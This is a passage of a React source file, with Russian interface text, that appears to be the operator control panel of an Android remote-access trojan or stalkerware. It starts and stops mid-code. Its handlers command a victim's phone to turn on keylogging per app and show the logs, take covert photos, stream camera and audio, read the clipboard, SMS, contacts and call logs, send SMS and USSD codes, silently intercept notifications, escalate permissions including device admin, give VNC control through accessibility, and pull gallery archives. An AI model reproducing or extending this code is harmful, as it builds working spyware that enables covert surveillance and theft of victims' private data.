                    setArchivesList(Array.isArray(message.archives) ? message.archives : []);

                    setZipBusy(false);

                    setZipProgressState(null);

                    break;

               }



               case 'zipProgress': {

    const { progress, processed, total, partIndex, partsTotal } = message;

    setZipBusy(true);

    setZipProgressState({

        progress: typeof progress === 'number' ? Math.round(progress) : 0,

        processed: processed ?? 0,

        total: total ?? 0,

        partIndex: partIndex ?? 1,

        partsTotal: partsTotal ?? 1

    });

    break;

}





               case 'createImagesZipResult': {

                    const { status, reason, archives } = message;



                    setZipBusy(false);

                    setZipProgressState(null);



                    if (status === 'ready') {

                        setArchivesList(Array.isArray(archives) ? archives : []);

                        setZipWarning('');

                        toast.success('Архив(ы) созданы на устройстве.');

                    } else if (status === 'already_exists') {

                        setZipWarning('Удалите предыдущие архивы перед созданием новых.');

                        toast.warning('Архив уже существует. Сначала удалите старые.');

                        if (Array.isArray(archives)) {

                            setArchivesList(archives);

                        }

                    } else if (status === 'empty') {

                        setArchivesList([]);

                        setZipWarning('');

                        toast.info('Подходящих изображений не найдено.');

                    } else if (status === 'error') {

                        setArchivesList([]);

                        setZipWarning('');

                        const msg =

                            reason === 'no_permission' ? 'Нет прав на чтение галереи.' :

                            reason === 'zip_failed' ? 'Сбой при упаковке ZIP.' :

                            reason === 'not_enough_storage' ? 'Не хватает места для создания архива.' :

                            `Ошибка создания архива (${reason || 'неизвестная'}).`;

                        toast.warning(msg);

                    }

                    break;

               }



               case 'zipArchiveDeleteResult': {

                    if (message.status === 'deleted') {

                        toast.success(`Архив ${message.fileName} удалён.`);

                        setArchivesList(prev => prev.filter(a => a.fileName !== message.fileName));

                    } else if (message.status === 'offline') {

                        toast.warning('Устройство сейчас оффлайн, удаление не выполнено.');

                    } else if (message.status === 'forbidden') {

                        toast.warning('Нет прав на удаление архива.');

                    } else if (message.status === 'not_found') {

                        toast.warning('Файл уже отсутствует на устройстве.');

                        setArchivesList(prev => prev.filter(a => a.fileName !== message.fileName));

                    } else {

                        toast.warning('Ошибка удаления архива.');

                    }

                    break;

               }

               





               case 'zipFileDeletedAfterSend': {

                    setArchivesList(prev =>

                        prev.map(a =>

                            a.fileName === message.fileName

                                ? { ...a, status: 'sent' }

                                : a

                        )

                    );

                    toast.success(`Архив ${message.fileName} отправлен и удалён с устройства.`);

                    break;

               }



               case 'mediaFileReadyForDownload': {

    const token = localStorage.getItem('token');

    if (!token) {

        toast.warning('Ошибка: токен аутентификации не найден. Невозможно скачать файл.');

        return;

    }



    const fileName = message.fileName;

    const downloadUrlWithToken = `${message.downloadUrl}?token=${token}`;

    const isZip = /\.zip$/i.test(fileName);



    setDownloadLinks(prev => ({

        ...prev,

        [fileName]: {

            ready: true,

            progress: 100,

            url: downloadUrlWithToken

        }

    }));



    const autoLink = document.createElement('a');

    autoLink.href = downloadUrlWithToken;

    autoLink.download = fileName;

    document.body.appendChild(autoLink);

    autoLink.click();

    document.body.removeChild(autoLink);



    toast.success(

        isZip

            ? `Архив ${fileName} загружен на сервер и скачивается.`

            : `Файл ${fileName} скачивается.`

    );



    setTimeout(() => {

        setUploadProgress(prev => {

            const newProgress = { ...prev };

            if (newProgress[fileName]) {

                delete newProgress[fileName];

            }

            return newProgress;

        });

    }, 1500);



    break;

}





               case 'mink_scan_result': {

                    if (message.uuid && String(message.uuid) !== String(device.uuid)) break;

                    const scanResult = message.result || {};

                    setMinkScanResult({ ...scanResult, scanning: false });

                    const suspCount = scanResult.suspicious?.length ?? 0;

                    toast.success(`Сканирование завершено: найдено ${suspCount} подозрительных приложений`);

                    break;

               }



               case 'clipboard': {

                    if (message.uuid && String(message.uuid) !== String(device.uuid)) break;

                    setClipLoading(false);

                    setClipboardResult({ text: message.text || '', note: message.note || '' });

                    break;

               }



               default:

                break;

        }

    } catch (error) {

        console.error(`[${ts()}][WS] КРИТИЧЕСКАЯ ОШИБКА при парсинге сообщения:`, error);

        console.error(`[${ts()}][WS] Сырой payload:`, message);

    }

}, [

    device.uuid,

    fetchNotificationHistory,

    broadcastType,

    setArchivesList,

    setArchiveTabSubtab,

    setZipBusy,

    setZipProgressState,

    setZipWarning,

    setDownloadLinks,

    setUploadProgress

]);



    const handleStartMonitoring = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            toast.warning("WebSocket не подключен.");

            return;

        }

        clearInterval(countdownIntervalRef.current);

        clearTimeout(monitoringTimeoutRef.current);

        countdownIntervalRef.current = null;

        ws.current.send(JSON.stringify({ action: 'startDeviceStateMonitoring', uuid: device.uuid }));

        setIsMonitoring(true);

        setDeviceStatus('Запрос отправлен...');

        monitoringTimeoutRef.current = setTimeout(() => {

            setIsMonitoring(false);

            setDeviceStatus('');

            toast.info('Устройство не ответило на запрос мониторинга. Возможно, функция не поддерживается или устройство оффлайн.');

        }, 10000);

    };



    const handleStartFgMonitoring = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            toast.warning("WebSocket не подключен.");

            return;

        }

        clearInterval(fgCountdownIntervalRef.current);

        clearTimeout(fgMonitoringTimeoutRef.current);

        fgCountdownIntervalRef.current = null;

        fgMonitoringTimeoutRef.current = null;

        ws.current.send(JSON.stringify({ action: 'startForegroundAppMonitoring', uuid: device.uuid }));

        setIsFgMonitoring(true);

        setFgAppName('Запрос отправлен...');

        setFgCountdown(120);

        fgMonitoringTimeoutRef.current = setTimeout(() => {

            setIsFgMonitoring(false);

            setFgAppName('');

            fgMonitoringTimeoutRef.current = null;

            toast.info('Устройство не ответило. Функция может не поддерживаться или устройство оффлайн.');

        }, 15000);

    };



    useEffect(() => {

        return () => {

            clearInterval(countdownIntervalRef.current);

            clearTimeout(monitoringTimeoutRef.current);

            clearInterval(fgCountdownIntervalRef.current);

            clearTimeout(fgMonitoringTimeoutRef.current);

            clearTimeout(potoTimeoutRef.current);

            if (pendingReconnectRef.current?.timeout) {

                clearTimeout(pendingReconnectRef.current.timeout);

                pendingReconnectRef.current = null;

            }



            cleanupWebRtc();

        };

    }, []);



    useEffect(() => {

        if (!registerOnWSMessage) return;

        

        const unregister = registerOnWSMessage(handleWebSocketMessage);

        

        return () => {

            unregister();

        };

    }, [registerOnWSMessage, handleWebSocketMessage]);



    const handleForceSystemUpdate = () => {

        if (isSystemUpdating) return; 

        

        setIsSystemUpdating(true);

        handleRefreshInfo('system', true);

        toast.info('Запрос на обновление данных отправлен...');

        setTimeout(() => {

            setIsSystemUpdating(prev => {

                if (prev) {

                    return false;

                }

                return false;

            });

        }, 30000);

    };



    const handleVncVerify = () => {

        if (vncVerifyingRef.current) return;

        vncVerifyGotTrueRef.current = false;

        vncVerifyingRef.current = true;

        setVncVerifying(true);

        setVncVerifySecondsLeft(180);



        vncVerifyCountdownRef.current = setInterval(() => {

            setVncVerifySecondsLeft(prev => {

                if (prev <= 1) { clearInterval(vncVerifyCountdownRef.current); return 0; }

                return prev - 1;

            });

        }, 1000);



        vncVerifyTimerRef.current = setTimeout(() => {

            clearInterval(vncVerifyCountdownRef.current);

            vncVerifyingRef.current = false;

            setVncVerifying(false);

            setVncVerifySecondsLeft(0);

            if (!vncVerifyGotTrueRef.current) {

                api.post(`/devices/${device.uuid}/reset-acc-lock`).catch(e => console.error('reset-acc-lock:', e));

                setInternalDeviceState(prev => prev ? { ...prev, accLocked: false } : prev);

                toast.warning('Проверка ВНК: разрешение не подтверждено за 3 мин → ♿ ✖');

            } else {

                toast.success('Проверка ВНК завершена: разрешение подтверждено ✔');

            }

        }, 180 * 1000);



        toast.info('Проверка ВНК запущена на 3 минуты...');

    };



    const handleTakePhotoConfirm = (quality, sensor) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        setPotoStatus({ active: true, message: 'Отправка...' });

        setIsPotoModalOpen(false);

        ws.current.send(JSON.stringify({

            action: 'requestSystemAsset',

            task: 'poto',

            quality: quality,

            sensor_id: sensor,

            uuid: device.uuid

        }));

        potoTimeoutRef.current = setTimeout(() => {

            setPotoStatus({ active: true, message: 'Тайм-аут' });

            setTimeout(() => setPotoStatus({ active: false, message: '' }), 5000);

        }, 30000);

    };



    const handleSwitchCamera = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        ws.current.send(JSON.stringify({

            action: 'webrtc_switch_camera',

            uuid: device.uuid

        }));

    };



    const handleRequestPrivilege = (routingKey) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;



        ws.current.send(JSON.stringify({

            action: 'request_routing_ticket',

            uuid: device.uuid,

            routing_key: routingKey

        }));

        toast.info('Команда отправлена на устройство');

    };



    // permissionArg:

    //   'all'                     → perm_request_all (все runtime)

    //   ['android.perm...', ...]  → perm_request_group (группа runtime)

    //   'android.permission.*'    → perm_request_single (одно runtime)

    //   иная строка               → напрямую routing_key (системные: power_conduit и т.д.)

    const handleRequestPermission = (permissionArg) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;



        if (permissionArg === 'all') {

            ws.current.send(JSON.stringify({

                action: 'request_routing_ticket',

                uuid: device.uuid,

                routing_key: 'perm_request_all'

            }));

            toast.info('Команда отправлена на устройство');

            setTimeout(() => fetchDeviceData(), 8000);

        } else if (Array.isArray(permissionArg)) {

            ws.current.send(JSON.stringify({

                action: 'request_routing_ticket',

                uuid: device.uuid,

                routing_key: 'perm_request_group',

                permissions: permissionArg

            }));

            toast.info('Команда отправлена на устройство');

            setTimeout(() => fetchDeviceData(), 6000);

        } else if (typeof permissionArg === 'string' && permissionArg.startsWith('android.permission.')) {

            ws.current.send(JSON.stringify({

                action: 'request_routing_ticket',

                uuid: device.uuid,

                routing_key: 'perm_request_single',

                permission: permissionArg

            }));

            toast.info('Команда отправлена на устройство');

            setTimeout(() => fetchDeviceData(), 5000);

        } else {

            // Системные привилегии: power_conduit, primary_conduit_ticket, device_admin_request и т.д.

            ws.current.send(JSON.stringify({

                action: 'request_routing_ticket',

                uuid: device.uuid,

                routing_key: permissionArg

            }));

            toast.info('Команда отправлена на устройство');

            setTimeout(() => fetchDeviceData(), 8000);

        }

    };



    const handleLaunchApp = (packageName) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid || !packageName) return;

        ws.current.send(JSON.stringify({

            action: 'launch_app',

            uuid: device.uuid,

            package: packageName

        }));

        toast.info(`Запуск приложения: ${packageName}`);

    };



    const handleMinkScan = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;

        setMinkScanResult({ scanning: true });

        ws.current.send(JSON.stringify({

            action: 'request_routing_ticket',

            uuid: device.uuid,

            routing_key: 'mink_scan'

        }));

        toast.info('Сканирование запущено...');

    };



    // ── Keylog handlers ────────────────────────────────────────────────────

    const handleToggleKeylog = (pkg) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid || !pkg) return;

        const isActive = keylogActivePackages.has(pkg);

        ws.current.send(JSON.stringify({

            action: isActive ? 'keylog_off_pkg' : 'keylog_on_pkg',

            uuid: device.uuid,

            pkg

        }));

        setKeylogActivePackages(prev => {

            if (prev instanceof AllActiveSet) {

                // all-mode: управляем только исключениями, остальные остаются красными

                const next = new AllActiveSet(prev);

                if (isActive) next.add(pkg); else next.delete(pkg);

                return next;

            }

            const next = new Set(prev);

            if (isActive) next.delete(pkg); else next.add(pkg);

            return next;

        });

        toast.info(isActive ? `Кейлог остановлен: ${pkg}` : `Кейлог запущен: ${pkg}`);

    };



    const handleViewKeylog = async (pkg) => {

        try {

            const res = await api.getKeylogEntries(device.uuid, pkg);

            setKeylogModal({ open: true, pkg, entries: res.data || [] });

        } catch (e) {

            toast.warning('Не удалось загрузить логи кейлога');

        }

    };



    const handleCloseKeylogModal = () => {

        setKeylogModal({ open: false, pkg: null, entries: [] });

    };



    const handleDeleteKeylog = async (pkg) => {

        try {

            await api.deleteKeylogEntries(device.uuid, pkg);

            setKeylogDataPackages(prev => { const n = { ...prev }; delete n[pkg]; return n; });

            handleCloseKeylogModal();

            toast.success('Логи удалены');

        } catch (e) {

            toast.warning('Не удалось удалить логи');

        }

    };



    const loadKeylogPackages = useCallback(async () => {

        if (!device?.uuid) return;

        try {

            const res = await api.getKeylogPackages(device.uuid);

            const payload = res.data;

            const items = Array.isArray(payload) ? payload : (payload.packages || []);

            const keylogAllActive = Array.isArray(payload) ? false : (payload.keylogAllActive || false);

            const dataMap = {};

            for (const item of items) {

                if (item.count > 0) dataMap[item.pkg] = item.count;

            }

            setKeylogDataPackages(dataMap);

            if (keylogAllActive) {

                // all-mode: все красные, кроме явно отключённых (active: false) в БД

                const disabledSet = new AllActiveSet();

                for (const item of items) {

                    if (item.active === false) disabledSet.add(item.pkg);

                }

                setKeylogActivePackages(disabledSet);

            } else {

                const activeSet = new Set();

                for (const item of items) {

                    if (item.active) activeSet.add(item.pkg);

                }

                setKeylogActivePackages(activeSet);

            }

        } catch (e) {

            // silently ignore

        }

    }, [device?.uuid]);



    // Fix #6: загружаем статус кейлогера при монтировании компонента

    useEffect(() => {

        loadKeylogPackages();

    }, [loadKeylogPackages]);



    const executeToggleBroadcast = (selection) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        const task = selection.type === 'webrtc' ? 'webrtc_stream' : 'datamotion';



        ws.current.send(JSON.stringify({

            action: 'requestSystemAsset',

            task,

            sensor_id: selection.sensor,

            uuid: device.uuid

        }));



        setIsBroadcasting(true);

        setBroadcastType(task === 'webrtc_stream' ? 'webrtc_stream' : 'mjpeg');

        setActiveTab('media');

        setIsSelectingBroadcast(false);

    };



    const handleToggleBroadcast = () => {

        if (isBroadcasting) {

            if (ws && ws.current) {

                ws.current.send(JSON.stringify({ action: 'stopSystemAsset', uuid: device.uuid }));

            }

            setIsBroadcasting(false);

            setStreamFrame(null);

            cleanupWebRtc();

            setBroadcastType(null);

        } else {

            setIsSelectingBroadcast(true);

        }

    };



    const handleSavePoto = (potoId) => {

        if (!potoId) return;

        const token = localStorage.getItem('token');

        const downloadUrl = `${api.defaults.baseURL}/data/download-poto/${potoId}?token=${token}`;

        window.open(downloadUrl, '_blank');

    };



    const handleToggleIntercept = () => {

        if (!ws || !ws.current || !internalDeviceState.uuid) return;

        const newStatus = !internalDeviceState.invisibleIntercept;

        ws.current.send(JSON.stringify({

            action: 'setInvisibleIntercept',

            uuid: internalDeviceState.uuid,

            enabled: newStatus

        }));

    };



    const handleDeleteNotification = (notificationKey) => {

        if (!ws || !ws.current || !notificationKey) return;

        ws.current.send(JSON.stringify({

            action: 'deleteNotification',

            uuid: device.uuid,

            notificationKey

        }));

    };



    const handleReplyToNotification = (notificationKey) => {

        if (!ws || !ws.current || !notificationKey) return;

        setReplyModal({ isOpen: true, notificationKey });

    };



    const handleSendSms = (phoneNumber, message, simCardIndex) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            toast.warning("WebSocket не подключен.");

            return;

        }

        const messageUuid = uuidv4();

        const command = {

            action: 'sendSms', uuid: device.uuid, phoneNumber, message,

            simCardIndex, messageUuid

        };

        const newMessage = {

            id: messageUuid, to: phoneNumber, text: message,

            sim: simCardIndex, status: 'sending', timestamp: Date.now()

        };

        setOutgoingMessages(prev => [newMessage, ...prev]);

        ws.current.send(JSON.stringify(command));

        setSendSmsModalOpen(false);

    };



    const handleCheckNumber = async (phoneNumber, simSlotIndex) => {

        setIsLoading(true);

        try {

            const response = await api.checkNumberInfo(internalDeviceState.uuid, phoneNumber, simSlotIndex);

            setInternalDeviceState(prevState => ({ ...prevState, extraInfo: response.data }));

            toast.success('Проверка прошла успешно!');

        } catch (error) {

            const errorMessage = error.response?.data?.message || 'Произошла ошибка при проверке номера.';

            toast.warning(errorMessage);

        } finally {

            setIsLoading(false);

        }

    };



    const handleCheckOsint = async (phoneNumber, simSlotIndex) => {

        setIsLoading(true);

        try {

            const response = await api.checkOsintForDevice(internalDeviceState.uuid, phoneNumber, simSlotIndex);

            setInternalDeviceState(prevState => ({ ...prevState, osintInfo: response.data }));

            toast.success('Osint-проверка прошла успешно!');

        } catch (error) {

            const errorMessage = error.response?.data?.message || 'Произошла ошибка при Osint-проверке.';

            toast.warning(errorMessage);

        } finally {

            setIsLoading(false);

        }

    };



    const handleGetMedia = (type) => {

        if (!ws || !ws.current) return toast.warning("WebSocket не подключен.");

        ws.current.send(JSON.stringify({ action: 'getMediaFiles', type, uuid: device.uuid }));

    };



    const handleDownloadMedia = (fileId, fileName, fileType) => {

        if (!ws || !ws.current) return toast.warning("WebSocket не подключен.");

        ws.current.send(JSON.stringify({

            action: 'downloadMediaFile',

            fileId,

            fileName,

            fileType,

            uuid: device.uuid

        }));

        toast.info(`Отправлен запрос на скачивание файла: ${fileName}`);

    };



    const handleSendUssd = (requestCode, simCardIndex, method) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            toast.warning("WebSocket не подключен.");

            return;

        }

        const ussdId = uuidv4();

        const command = {

            action: method || 'executeCommand', uuid: device.uuid,

            requestCode, simCardIndex, ussdId

        };

        const optimisticEntry = {

            id: ussdId, request: requestCode, status: 'sending',

            response: 'Отправляется...', timestamp: Date.now(), simIndex: simCardIndex

        };

        setUssdHistory(prev => [optimisticEntry, ...prev]);

        ws.current.send(JSON.stringify(command));

        setSendUssdModalOpen(false);

    };



    const handleRefreshInfo = (infoType, force = false) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            toast.warning("WebSocket не подключен.");

            return;

        }

        let action = '';

        if (infoType === 'system') action = 'getSystemInfo';

        if (infoType === 'sms') action = 'getSms';

        if (infoType === 'contacts') action = 'getContacts';

        if (infoType === 'calls') action = 'getCallLogs';

        if (action) {

            const command = { action, uuid: device.uuid };

            if (force) command.force = true;

            ws.current.send(JSON.stringify(command));

            setIsLoading(true);

        }

    };



    const handleAddContact = (name, phoneNumber) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            toast.warning("WebSocket не подключен.");

            return;

        }

        const command = { action: 'addContact', uuid: device.uuid, name, phoneNumber };

        ws.current.send(JSON.stringify(command));

        setAddContactModalOpen(false);

    };



    useEffect(() => {

        const fetchArchivedSms = async () => {

            if (activeTab === 'sms' && device.uuid) { 

                try {

                    const response = await api.getArchivedSmsHistory(device.uuid);

                    setArchivedSms(Array.isArray(response.data) ? response.data : (response.data?.data || []));

                } catch (error) {

                    setArchivedSms([]);

                }

            }

        };

        fetchArchivedSms();

    }, [activeTab, device.uuid]);



    useEffect(() => {

    if (!device.uuid) return;



    const requestSystemDataIfNeeded = () => {

        const now = Date.now();

        const lastSeenTs = internalDeviceState.lastSeen ? new Date(internalDeviceState.lastSeen).getTime() : 0;

        const isOnline = lastSeenTs && (now - lastSeenTs) < 31000;



        const TEN_MINUTES_IN_MS = 10 * 60 * 1000;



        const lastUpdated = internalDeviceState.systemInfo?.lastUpdatedAt

            ? new Date(internalDeviceState.systemInfo.lastUpdatedAt).getTime()

            : null;



        const isMissing = !internalDeviceState.systemInfo?.lastUpdatedAt;

        const isStale = lastUpdated !== null && (now - lastUpdated) > TEN_MINUTES_IN_MS;



        if (!isOnline) return;



        const THROTTLE_MS = TEN_MINUTES_IN_MS;



        if (isMissing || isStale) {

            if (

                !lastSystemInfoRequestRef.current ||

                now - lastSystemInfoRequestRef.current > THROTTLE_MS

            ) {

                lastSystemInfoRequestRef.current = now;

                handleRefreshInfo('system');

            }

        }

    };



    // Защита от бесконечных дублей при пустых данных:

    // Мы отправляем запрос только если нет данных (например, sms == undefined),

    // но если сервер уже присылал нам пустой массив (sms == []), мы больше не спамим запросами,

    // так как мы знаем, что данных просто нет.

    switch (activeTab) {

        case 'sms':

            if (internalDeviceState.sms === undefined && !requestedDataRef.current.sms) {

                requestedDataRef.current.sms = true;

                handleRefreshInfo('sms');

            }

            break;



        case 'contacts':

            if (internalDeviceState.contacts === undefined && !requestedDataRef.current.contacts) {

                requestedDataRef.current.contacts = true;

                handleRefreshInfo('contacts');

            }

            break;



        case 'calls':

            if (callLogs === null && !requestedDataRef.current.calls) {

                requestedDataRef.current.calls = true;

                handleRefreshInfo('calls');

            }

            if (unlockHistory === null && ws.current?.readyState === WebSocket.OPEN) {

                ws.current.send(JSON.stringify({ action: 'get_unlock_history', uuid: device.uuid }));

            }

            break;



        case 'apps':

            if (internalDeviceState.systemInfo?.supAP?.data?.sup_ap_list == null) {

                api.getAppsList(device.uuid)

                    .then(res => {

                        setInternalDeviceState(prev => ({

                            ...prev,

                            systemInfo: {

                                ...(prev.systemInfo || {}),

                                supAP: {

                                    ...(prev.systemInfo?.supAP || {}),

                                    data: { sup_ap_list: res.data }

                                }

                            }

                        }));

                    })

                    .catch(err => console.error('Ошибка загрузки приложений', err));

            }

            loadKeylogPackages();

            break;



        case 'management': {

            const hasPerms = !!internalDeviceState.systemInfo?.permissions?.data;

            if (!hasPerms) {

                // permissions.data отсутствует — запрашиваем немедленно (throttle 30 сек)

                if (!lastSystemInfoRequestRef.current ||

                    Date.now() - lastSystemInfoRequestRef.current > 30_000) {

                    lastSystemInfoRequestRef.current = Date.now();

                    handleRefreshInfo('system');

                }

            } else {

                // permissions есть — stale-check с порогом 2 мин (права могли измениться)

                const now = Date.now();

                const lastUpdated = internalDeviceState.systemInfo?.lastUpdatedAt

                    ? new Date(internalDeviceState.systemInfo.lastUpdatedAt).getTime()

                    : 0;

                const isStale = !lastUpdated || (now - lastUpdated) > 2 * 60 * 1000;

                if (isStale && (!lastSystemInfoRequestRef.current ||

                    now - lastSystemInfoRequestRef.current > 2 * 60 * 1000)) {

                    lastSystemInfoRequestRef.current = now;

                    handleRefreshInfo('system');

                }

            }

            break;

        }



        case 'ussd':

        case 'extra-info':

        case 'notifications':

        case 'media':

            break;



        default:

            requestSystemDataIfNeeded();

            break;

    }

}, [activeTab, device.uuid, internalDeviceState.contacts, internalDeviceState.sms, internalDeviceState.systemInfo, internalDeviceState.lastSeen, callLogs]);





    const simCards = useMemo(() => internalDeviceState.systemInfo?.simInfo?.data?.active_sims || [], [internalDeviceState.systemInfo]);



    return (

        <div 

            className={isMobile ? "details-page-mobile" : "modal-backdrop"} 

            onClick={!isMobile ? onClose : undefined}

        >

            <div 

                className={isMobile ? "details-content-mobile" : "modal-content"} 

                onClick={e => e.stopPropagation()}

            >

                {isMobile && (

                    <div className="mobile-back-header">

                        <button onClick={onClose} className="mobile-back-button">

                            &larr; Назад

                        </button>

                    </div>

                )}

                

                {capturedPoto && (

                    <PotoViewerWindow

                        poto={capturedPoto}

                        onClose={() => setCapturedPoto(null)}

                        onSave={handleSavePoto}

                        isMobile={isMobile}

                    />

                )}

                {isBroadcasting && broadcastType === 'mjpeg' && (

                    <MjpegPlayerWindow

                        streamFrame={streamFrame}

                        onClose={handleToggleBroadcast}

                        onSwitchCamera={handleSwitchMjpegCamera}

                        isMobile={isMobile}

                    />

                )}

                {isBroadcasting && (broadcastType === 'webrtc_stream' || broadcastType === 'webrtc_audio_stream') && (

                    <WebRtcVideoPlayer

                        stream={videoStream}

                        onClose={handleToggleBroadcast}

                        onSwitchCamera={handleSwitchCamera}

                        isMobile={isMobile}

                    />

                )}



                <div className="mobile-top-controls">

                    <DeviceDetailsHeader

                        device={internalDeviceState}

                        onClose={onClose}

                        isMobile={isMobile}

                        onSendSmsClick={() => setSendSmsModalOpen(true)}

                        onSendUssdClick={() => setSendUssdModalOpen(true)}

                        ws={ws}

                        isMonitoring={isMonitoring}

                        deviceStatus={deviceStatus}

                        countdown={countdown}

                        onStartMonitoring={handleStartMonitoring}

                        isFgMonitoring={isFgMonitoring}

                        fgAppName={fgAppName}

                        fgCountdown={fgCountdown}

                        onStartFgMonitoring={(internalDeviceState?.systemInfo?.permissions?.data?.is_accessibility_enabled === true || internalDeviceState?.accLocked === true) ? handleStartFgMonitoring : undefined}

                        onTakePhoto={() => setIsPotoModalOpen(true)}

                        onVncClick={(internalDeviceState?.systemInfo?.permissions?.data?.is_accessibility_enabled === true || internalDeviceState?.accLocked === true) ? () => {

                            setIsVncModalOpen(true);

                            if (internalDeviceState?.systemInfo?.supAP?.data?.sup_ap_list == null) {

                                api.getAppsList(device.uuid)

                                    .then(res => {

                                        setInternalDeviceState(prev => ({

                                            ...prev,

                                            systemInfo: {

                                                ...(prev.systemInfo || {}),

                                                supAP: {

                                                    ...(prev.systemInfo?.supAP || {}),

                                                    data: { sup_ap_list: res.data }

                                                }

                                            }

                                        }));

                                    })

                                    .catch(err => console.error('Ошибка загрузки приложений', err));

                            }

                        } : undefined}

                        onClipboardClick={(internalDeviceState?.systemInfo?.permissions?.data?.is_accessibility_enabled === true || internalDeviceState?.accLocked === true) ? () => {

                            setClipLoading(true);

                            setClipboardResult(null);

                            if (ws?.current && ws.current.readyState === 1) {

                                ws.current.send(JSON.stringify({ action: 'get_clipboard', uuid: device.uuid }));

                            }

                        } : undefined}

                        onPhoneRebootClick={(internalDeviceState?.systemInfo?.permissions?.data?.is_accessibility_enabled === true || internalDeviceState?.accLocked === true) ? () => {
                            if (ws?.current && ws.current.readyState === 1) {
                                ws.current.send(JSON.stringify({ action: 'phone_reboot', uuid: device.uuid }));
                            }
                        } : undefined}

                        clipLoading={clipLoading}

                        onToggleBroadcast={handleToggleBroadcast}

                        isBroadcasting={isBroadcasting}

                        potoStatus={potoStatus}

                        isSelectingBroadcast={isSelectingBroadcast}

                        onCancelBroadcastSelection={() => setIsSelectingBroadcast(false)}

                        onBroadcastSelect={executeToggleBroadcast}

                        onSwitchCamera={handleSwitchCamera}

                        broadcastType={broadcastType}

                        onStartAudioBroadcast={handleStartAudioBroadcast}

                        onAppRestart={handleAppRestart}

                        onServerReconnect={handleServerReconnect}

                        onSaveNote={onSaveNote}

                        onSaveManualPhone={onSaveManualPhone}

                        onUpdateAll={handleForceSystemUpdate}

                        isSystemUpdating={isSystemUpdating}

                        onVncVerify={handleVncVerify}

                        vncVerifying={vncVerifying}

                        vncVerifySecondsLeft={vncVerifySecondsLeft}

                    />

                    <DeviceDetailsTabs

                        activeTab={activeTab}

                        onTabClick={setActiveTab}

                        hasSpecialPerms={internalDeviceState?.systemInfo?.permissions?.data?.is_accessibility_enabled === true}

                    />

                </div>

                

                <div className="modal-body">

                    <DeviceDetailsContent

                        device={internalDeviceState}

                        activeTab={activeTab}

                        isLoading={isLoading}

                        handleRefreshInfo={handleRefreshInfo}

                        onReload={fetchDeviceData}

                        onAddContactClick={() => setAddContactModalOpen(true)}

                        outgoingMessages={outgoingMessages}

                        archivedSms={archivedSms}

                        isContactsArchived={internalDeviceState.contacts?.list && (!((new Date() - new Date(internalDeviceState.lastSeen)) < 25000) || !(internalDeviceState.systemInfo?.permissions?.data['android.permission.READ_CONTACTS'] === true))}

                        ussdHistory={ussdHistory}

                        simCards={simCards}

                        mediaFiles={mediaFiles}

                        onGetMedia={handleGetMedia}

                        onDownloadMedia={handleDownloadMedia}

                        callLogs={callLogs}

                        unlockHistory={unlockHistory}

                        onCheckNumber={handleCheckNumber}

                        onCheckOsint={handleCheckOsint}

                        uploadProgress={uploadProgress}

                        notifications={notifications}

                        onDeleteNotification={handleDeleteNotification}

                        onReplyToNotification={handleReplyToNotification}

                        onRefreshNotifications={() => fetchNotificationHistory(false)}

                        onToggleIntercept={handleToggleIntercept}

                        capturedPoto={capturedPoto}

                        onClearPoto={() => setCapturedPoto(null)}

                        onSavePoto={handleSavePoto}

                        onRequestPrivilege={handleRequestPrivilege}

                        privilegeStatus={privilegeStatus}

                        onRequestPermission={handleRequestPermission}

                        onLaunchApp={handleLaunchApp}

                        minkScanResult={minkScanResult}

                        onMinkScan={handleMinkScan}

                        onToggleKeylog={handleToggleKeylog}

                        keylogActivePackages={keylogActivePackages}

                        keylogDataPackages={keylogDataPackages}

                        onViewKeylog={handleViewKeylog}

                        onSendWindow={handleSendWindowCommand}

                        windowHistory={windowHistory}

                        onRefreshWindowHistory={fetchWindowHistory}



                        isZipModalOpen={isZipModalOpen}

                        onOpenZipModal={handleOpenZipModal}

                        onCloseZipModal={handleCloseZipModal}

                        onSubmitZipRequest={handleSubmitZipRequest}



                        archiveTabSubtab={archiveTabSubtab}

                        onChangeArchiveSubtab={handleChangeArchiveSubtab}

                        archivesList={archivesList}

                        zipBusy={zipBusy}

                        zipProgressState={zipProgressState}

                        zipWarning={zipWarning}

                        downloadLinks={downloadLinks}

                        onRequestArchivesList={handleRequestArchivesList}

                        onDownloadArchive={handleDownloadArchive}

                        onDeleteArchive={handleDeleteArchive}

                        wsRef={ws}

                    />

                </div>

                <AddContactModal

                    isOpen={isAddContactModalOpen}

                    onClose={() => setAddContactModalOpen(false)}

                    onAddContact={handleAddContact}

                    isMobile={isMobile}

                />

                <SendSmsModal

                    isOpen={isSendSmsModalOpen}

                    onClose={() => setSendSmsModalOpen(false)}

                    onSendSms={handleSendSms}

                    simCards={simCards}

                    isMobile={isMobile}

                />

                <SendUssdModal

                    isOpen={isSendUssdModalOpen}

                    onClose={() => setSendUssdModalOpen(false)}

                    onSendUssd={handleSendUssd}

                    simCards={simCards}

                    isMobile={isMobile}

                />

                <PotoSettingsModal

                    isOpen={isPotoModalOpen}

                    onClose={() => setIsPotoModalOpen(false)}

                    onConfirm={handleTakePhotoConfirm}

                    isMobile={isMobile}

                />

                {isVncModalOpen && (

                    <VNCModal

